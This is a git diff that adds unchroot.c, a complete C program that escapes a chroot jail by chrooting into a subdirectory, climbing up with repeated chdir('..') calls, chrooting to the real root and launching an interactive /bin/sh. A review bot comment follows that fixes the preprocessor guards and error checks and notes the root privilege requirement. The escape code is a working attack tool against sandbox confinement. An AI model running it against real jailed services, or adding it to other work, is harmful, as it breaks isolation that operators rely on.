Diffstat (limited to 'src/tools/unchroot.c')
-rw-r--r-- | src/tools/unchroot.c | 125 |
1 files changed, 125 insertions, 0 deletions
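--- /dev/null
+++ b/src/tools/unchroot.c
@@ -0,0 +1,125 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <errno.h>
+#include <fcntl.h>
+#include <string.h>
+#include <unistd.h>
+#include <sys/stat.h>
+#include <sys/types.h>
+
+/*
+** You should set NEED_FCHDIR to 1 if the chroot() on your
+** system changes the working directory of the calling
+** process to the same directory as the process was chroot()ed
+** to.
+**
+** It is known that you do not need to set this value if you
+** running on Solaris 2.7 and below.
+**
+*/
+#define NEED_FCHDIR 0
+
+#define TEMP_DIR "waterbuffalo"
+
+/* Break out of a chroot() environment in C */
+
+int main() {
+int x; /* Used to move up a directory tree */
+int done=0; /* Are we done yet ? */
+#ifdef NEED_FCHDIR
+int dir_fd; /* File descriptor to directory */
+#endif
+struct stat sbuf; /* The stat() buffer */
+
+/*
+** First we create the temporary directory if it doesn't exist
+*/
+if (stat(TEMP_DIR,&sbuf)<0) {
+if (errno==ENOENT) {
+if (mkdir(TEMP_DIR,0755)<0) {
+fprintf(stderr,"Failed to create %s - %s\n", TEMP_DIR,
+strerror(errno));
+exit(1);
+}
+}
+else {
+fprintf(stderr,"Failed to stat %s - %s\n", TEMP_DIR,
+strerror(errno));
+exit(1);
+}
+}
+else if (!S_ISDIR(sbuf.st_mode)) {
+fprintf(stderr,"Error - %s is not a directory!\n",TEMP_DIR);
+exit(1);
+}
+
+#ifdef NEED_FCHDIR
+/*
+** Now we open the current working directory
+**
+** Note: Only required if chroot() changes the calling program's
+** working directory to the directory given to chroot().
+**
+*/
+if ((dir_fd=open(".",O_RDONLY))<0) {
+fprintf(stderr,"Failed to open \".\" for reading - %s\n",
+strerror(errno));
+exit(1);
+}
+#endif
+
+/*
+** Next we chroot() to the temporary directory
+*/
+if (chroot(TEMP_DIR)<0) {
+fprintf(stderr,"Failed to chroot to %s - %s\n",TEMP_DIR,
+strerror(errno));
+exit(1);
+}
+
+#ifdef NEED_FCHDIR
+/*
+** Partially break out of the chroot by doing an fchdir()
+**
+** This only partially breaks out of the chroot() since whilst
+** our current working directory is outside of the chroot() jail,
+** our root directory is still within it. Thus anything which refers
+** to "/" will refer to files under the chroot() point.
+**
+** Note: Only required if chroot() changes the calling program's
+** working directory to the directory given to chroot().
+**
+*/
+if (fchdir(dir_fd)<0) {
+fprintf(stderr,"Failed to fchdir - %s\n",
+strerror(errno));
+exit(1);
+}
+close(dir_fd);
+#endif
+
+/*
+** Completely break out of the chroot by recursing up the directory
+** tree and doing a chroot to the current working directory (which will
+** be the real "/" at that point). We just do a chdir("..") lots of
+** times (1024 times for luck :). If we hit the real root directory before
+** we have finished the loop below it doesn't matter as .. in the root
+** directory is the same as . in the root.
+**
+** We do the final break out by doing a chroot(".") which sets the root
+** directory to the current working directory - at this point the real
+** root directory.
+*/
+for(x=0;x<1024;x++) {
+chdir("..");
+}
+chroot(".");
+
+/*
+** We're finally out - so exec a shell in interactive mode
+*/
+if (execl("/bin/sh","-i",NULL)<0) {
+fprintf(stderr,"Failed to exec - %s\n",strerror(errno));
+exit(1);
+}
+}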
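Review bot: The `#ifdef NEED_FCHDIR` guards at new lines 29, 56 and 80 are always true, because line 20 defines the macro (as 0), so the `open(".")`/`fchdir()` path is compiled in whatever value is chosen; testing the value with `#if NEED_FCHDIR` would match the 0/1 setting described in the comment at lines 10-19. The `chdir("..")` loop and the final `chroot(".")` at lines 113-116 discard their return values, so a failure there still falls through to the exec of `/bin/sh` with no diagnostic; the final call could be checked like the first one, `if (chroot(".")<0) { fprintf(stderr,"Failed to chroot to . - %s\n",strerror(errno)); exit(1); }`. The one-line header at line 24 should also state the precondition the code itself shows at line 74, for example `/* Requires the privilege to call chroot() (root, or CAP_SYS_CHROOT on Linux); without it the program exits at the first chroot(). */`, since that is the fact a reader assessing a jail needs.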